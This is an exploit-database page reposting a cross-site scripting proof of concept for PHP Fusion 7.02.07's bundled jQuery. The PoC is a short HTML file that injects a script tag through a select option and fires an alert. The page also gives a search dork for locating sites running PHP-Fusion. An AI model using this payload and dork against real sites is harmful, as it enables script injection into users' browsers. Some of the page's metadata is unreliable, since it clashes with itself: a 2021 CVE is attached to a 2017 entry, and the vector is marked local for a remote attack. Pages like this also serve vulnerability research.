Advertisement






PHP Fusion 7.02.07 jQuery cross site scripting Exploits

CVE Category Price Severity
CVE-2021-46001 CWE-79 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2017-12-25
CPE
cpe:cpe:/a:php-fusion:php-fusion:7.02.07
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017120225

Below is a copy:

PHP Fusion 7.02.07 jQuery cross site scripting Exploits
========================================================================
| # Title     : PHP Fusion 7.02.07 jQuery cross site scripting EXploits
| # Author    : indoushka
| # email     : [email protected]
| # Tested on : windows 8.1 Franais V.(Pro)
| # Version   : 7.02.07
| # Vendor    : https://www.php-fusion.co.uk/downloads.php
| # Dork      : Powered by PHP-Fusion
========================================================================

poc :

<html>
<head>
  <meta charset="utf-8">
  <title>XSS Reflected - Jquery 1.7.2 </title>
  <script src="http://127.0.0.1//files/includes/jquery/jquery.js"></script>
  <script>
    $(function() {
      $('#users').each(function() {
        var select = $(this);
        var option = select.children('option').first();
        select.after(option.text());
        select.hide();
      });
    });
  </script>
</head>
 
 
<body>
  <form method="post">
    <p>
      <select id="users" name="users">
        <option value="xssreflected"><script>alert('xss
reflected - jquery 1.7.2 by - indoushka thnx to 
@firebitsbr - [email protected]');</script></option>
      </select>
    </p>
  </form>
</body>
</html>


Greetz :   ------ --------  o ------
                                                                       |
jericho * Larry W. Cashdollar * moncet-1 * achraf.tn                   |
                                                                       |
===================== p o   =============================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum